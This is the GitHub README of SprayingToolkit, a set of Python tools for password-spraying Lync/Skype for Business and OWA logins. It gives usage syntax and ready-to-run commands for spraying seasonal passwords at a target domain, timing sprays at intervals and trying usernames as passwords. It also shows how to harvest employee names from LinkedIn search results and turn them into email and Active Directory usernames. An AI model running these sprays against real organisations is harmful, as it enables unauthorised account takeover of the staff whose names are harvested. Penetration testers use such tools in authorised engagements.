Skip to content
Scripts to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient
Branch: master
Clone or download
byt3bl33d3r Merge pull request #10 from GoSecure/fixed_error_msg
Fixed #7 - Error message from O365 had changed
Latest commit f493c24 Mar 26, 2019

README.md

SprayingToolkit

SprayingToolkit

Description

A set of Python scripts/utilities that tries to make password spraying attacks against Lync/S4B & OWA a lot quicker, less painful and more efficient.

Brought To You By

blackhillsinfosec

Tool Overview

Atomizer

A blazing fast password sprayer for Lync/Skype For Business and OWA, built on Asyncio and Python 3.7

Usage

Usage:
    atomizer (lync|owa) <target> <password> <userfile> [--threads THREADS] [--debug]
    atomizer (lync|owa) <target> <passwordfile> <userfile> --interval <TIME> [--gchat <URL>] [--slack <URL>][--threads THREADS] [--debug]
    atomizer (lync|owa) <target> --csvfile CSVFILE [--user-row-name NAME] [--pass-row-name NAME] [--threads THREADS] [--debug]
    atomizer (lync|owa) <target> --user-as-pass USERFILE [--threads THREADS] [--debug]
    atomizer (lync|owa) <target> --recon [--debug]
    atomizer -h | --help
    atomizer -v | --version

Arguments:
    target         target domain or url
    password       password to spray
    userfile       file containing usernames (one per line)
    passwordfile   file containing passwords (one per line)

Options:
    -h, --help               show this screen
    -v, --version            show version
    -c, --csvfile CSVFILE    csv file containing usernames and passwords
    -i, --interval TIME      spray at the specified interval [format: "H:M:S"]
    -t, --threads THREADS    number of concurrent threads to use [default: 3]
    -d, --debug              enable debug output
    --recon                  only collect info, don't password spray
    --gchat URL              gchat webhook url for notification
    --slack URL              slack webhook url for notification
    --user-row-name NAME     username row title in CSV file [default: Email Address]
    --pass-row-name NAME     password row title in CSV file [default: Password]
    --user-as-pass USERFILE  use the usernames in the specified file as the password (one per line)

Examples

python atomizer.py owa contoso.com 'Fall2018' emails.txt
python atomizer.py lync contoso.com 'Fall2018' emails.txt
python atomizer lync contoso.com --csvfile accounts.csv
python atomizer lync contoso.com --user-as-pass usernames.txt
python atomizer owa 'https://owa.contoso.com/autodiscover/autodiscover.xml' --recon
python atomizer.py owa contoso.com passwords.txt emails.txt -i 0:45:00 --gchat <GCHAT_WEBHOOK_URL>

Vaporizer

A port of @OrOneEqualsOne's GatherContacts Burp extension to mitmproxy with some improvements.

Scrapes Google and Bing for LinkedIn profiles, automatically generates emails from the profile names using the specified pattern and performes password sprays in real-time.

(Built on top of Atomizer)

Examples

mitmdump -s vaporizer.py --set sprayer=(lync|owa) --set domain=domain.com --set target=<domain or url to spray> --set password=password --set email_format='{f}.{last}'

By default email_format is set to {first}.{last} pattern and is not a required argument.

The domain parameter is the domain to use for generating emails from names, the target parameter is the domain or url to password spray

Install the mitmproxy cert, set the proxy in your browser, go to google and/or bing and search (make sure to include the /in):

site:linkedin.com/in "Target Company Name"

Emails will be dumped to emails.txt in the specified format, and passed to Atomizer for spraying.

Aerosol

Scrapes all text from the target website and sends it to AWS Comprehend for analysis to generate custom wordlists for password spraying.

Still a work in progress

Usage

mitmdump -s aerosol.py --set domain=domain.com

Spindrift

Converts names to active directory usernames (e.g Alice Eve => CONTOSO\aeve)

Usage

Usage:
    spindrift [<file>] [--target TARGET | --domain DOMAIN] [--format FORMAT]

Arguments:
    file    file containing names, can also read from stdin

Options:
    --target TARGET   optional domain or url to retrieve the internal domain name from OWA
    --domain DOMAIN   manually specify the domain to append to each username
    --format FORMAT   username format [default: {f}{last}]

Examples

Reads names from STDIN, --domain is used to specify the domain manually:

cat names.txt | ./spindrift.py --domain CONTOSO

Reads names from names.txt, --target dynamically grabs the internal domain name from OWA (you can give it a domain or url)

python spindrift.py names.txt --target contoso.com
You can’t perform that action at this time.